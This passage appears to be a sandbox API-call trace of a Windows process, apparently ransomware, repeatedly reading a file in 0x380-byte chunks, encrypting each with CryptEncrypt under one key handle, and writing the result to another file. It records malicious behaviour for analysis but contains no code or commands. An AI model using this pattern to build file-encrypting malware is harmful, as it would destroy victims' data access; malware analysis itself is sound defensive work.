1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.617] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.618] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.618] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.619] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.619] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.619] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.619] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.619] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.619] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.620] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.621] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.621] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.622] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.622] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.622] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.622] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0243.622] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0243.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, 